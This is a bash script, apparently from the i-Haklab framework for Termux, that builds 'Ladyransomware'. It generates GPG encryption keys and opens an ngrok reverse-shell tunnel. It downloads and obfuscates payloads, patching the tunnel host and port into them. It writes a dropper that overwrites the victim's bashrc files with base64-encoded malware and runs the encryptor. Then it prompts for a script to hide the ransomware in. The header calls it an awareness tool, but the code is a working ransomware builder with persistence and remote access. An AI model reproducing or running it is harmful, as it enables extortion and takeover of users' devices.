#!/usr/bin/bash
# Ransomux Project by LadyRansomware
# on colaboration with @Ivam3 and @Milux from @Ivam3byCinderella.community
# Created on July 2021 only for i-Haklab framework.
#
# This project was created to make Termux users aware of the great risks involved in executing scripts without prior review. This in order to eradicate the so-called scrip kiddies by encouraging them to obtain real knowledge about cybersecurity, ethical hacking and learn to protect themselves.
#
# Contact for help https://t.me/kassysalazar.
IFS=$'\n\t'
trap ctrl_c 2
source $PREFIX/share/i-Haklab/.set/var/variables
source $iHAKLAB/.set/functions/functions
ctrl_c(){ printf "\n$Y\n   (¿) Need a help (?)$B\nTelegram : t.me/Ivam3_Bot$W\n";exit;}
printf "$M ____                                      __  __\n|  _ \ __ _ _ __  ____ ___  _ __ ___  _   _\ \/ /\n| |_) / _\` | '_ \/ __|/ _ \| '_ \` _ \| | | |\  /\n|  _ < (_| | | | \__ \ (_) | | | | | | |_| |/  \\ \n|_| \_\__,_|_| |_|___/\___/|_| |_| |_|\__,_/_/\_\\ \n#::::::::::::by::Lady::Ransomware::::::::::::::::#$W\n"

#:::SETTINGS:::#
[[ -d ~/.gnupg ]] && rm -rf ~/.gnupg
printf "$G(_>)─➤$W Installing dependencies.\n"
yes apt update && yes|apt upgrade && yes|apt install gnupg coreutils nmap-ncat nodejs && npm install -g bash-obfuscate
[[ -e $PREFIX/etc/apt/sources.list.d/abhacker.repo.list ]] && yes|apt install ngrok-server || bash $iHAKLAB/.set/fix-tools/instAbhackerRepo --install ngrok-server

printf "$G(_>)─➤$W Let's to create encrypt and decrypt keys$Y\n ╰────➤$W remember, passphrase is the key to delete de ramsonware\n";sleep 2;gpg --generate-key
uid=$(gpg -k|grep "ultimate"|awk -F " " '{print $3}')
email=$(gpg -k|grep "ultimate"|awk -F " " '{print $4}')
gpg --armor --output ~/.gnupg/public-key.gpg --export $email
key=$(cat ~/.gnupg/public-key.gpg)

printf "$G(_>)─➤$W Setting reverse shell."
exec ngrok -tcp 4546 >/dev/null 2>/dev/null &
revHOST=$(curl -sSL http://localhost:4040/api/tunnels|cut -d '"' -f14|awk -F "/" '{print $3}'|cut -d ":" -f1)
revPORT=$(curl -sSL http://localhost:4040/api/tunnels|cut -d '"' -f14|awk -F "/" '{print $3}'|cut -d ":" -f2)
[[ -z $revHOST ]] && { printf >&2 "$R\n(_>)─➤ ERROR :$W ngrok tunnel failed\n";ctrl_c;}

wget -q $iHDB/share/lady -O $iHAKLAB/.set/share/lady
wget -q $iHDB/share/ransomware -O $iHAKLAB/.set/share/ransomware
chmod 777 $iHAKLAB/.set/share/lady
chmod 777 $iHAKLAB/.set/share/ransomware
sed 's|eval|echo|g' -i $iHAKLAB/.set/share/lady
bash $iHAKLAB/.set/share/lady > $TMPDIR/lady.deo
rm -f $iHAKLAB/.set/share/lady
sed "s|HERETUNNEL|'$revHOST'|g" -i $TMPDIR/lady.deo
sed "s|HEREPORT|'$revPORT'|g" -i $TMPDIR/lady.deo
sed "s|EMILIO|$email'|g" -i $TMPDIR/lady.deo
bash-obfuscate $TMPDIR/lady.deo -o $iHAKLAB/.set/share/lady
printf "#!/usr/bin/bash\nsource $PREFIX/libexec/termux/.restore" > $TMPDIR/bashrc.deo
bash-obfuscate $TMPDIR/bashrc.deo -o $TMPDIR/bashrc
sed 's|eval|echo|g' -i $iHAKLAB/.set/share/ransomware
bash $iHAKLAB/.set/share/ransomware > $TMPDIR/ransomware.deo
sed "s|HACKERITA|$uid|g" -i $TMPDIR/ransomware.deo
rm -f $iHAKLAB/.set/share/ransomware
bash-obfuscate $TMPDIR/ransomware.deo -o $iHAKLAB/.set/share/ransomware
bashrc64=$(base64 $TMPDIR/bashrc)
unransom64=$(base64 $iHAKLAB/.set/share/unransomware)
lady64=$(base64 $iHAKLAB/.set/share/lady)
ransom64=$(base64 $iHAKLAB/.set/share/ransomware)
rm -rf $TMPDIR/*

#:::RANSOMWARE:::#
cat <<- CONF > $iHAKLAB/.set/share/ladyransomware.deo
#!/usr/bin/bash
command -v gpg >/dev/null || yes|apt install gnupg >/dev/null 2>&1
command -v base64 >/dev/null || yes|apt install coreutils >/dev/null 2>&1
echo "$key" > $TMPDIR/key.$uid
gpg --import $TMPDIR/key.$uid > /dev/null 2>/dev/null;rm $TMPDIR/key.$uid
cat $PREFIX/etc/bash.bashrc > $PREFIX/etc/bashito
base64 -d >$PREFIX/etc/bash.bashrc<<DIXIE
$lady64
DIXIE
base64 -d >~/.bashrc<<DIXIE
$bashrc64
DIXIE
base64 -d >$PREFIX/libexec/termux/.restore<<DIXIE
$unransom64
DIXIE
chmod 777 $PREFIX/libexec/termux/.restore
base64 -d >$TMPDIR/1q2w3e4r5t6y7u8i9o0p.tmp<<DIXIE
$ransom64
DIXIE
chmod 777 $TMPDIR/1q2w3e4r5t6y7u8i9o0p.tmp
source $TMPDIR/1q2w3e4r5t6y7u8i9o0p.tmp
rm -r $TMPDIR/1q2w3e4r5t6y7u8i9o0p.tmp
CONF
bash-obfuscate $iHAKLAB/.set/share/ladyransomware.deo -O $iHAKLAB/ladyransomware
rm -f $iHAKLAB/.set/share/ladyransomware.deo

printf "$G(_>)_Script_to_hide_the_ransomware$W"
while read -p " ╰────➤ " script [ -z $script ] || [ -e $script ];do
	printf >&2 "$R(_>)─➤$W Not such file\n"
done
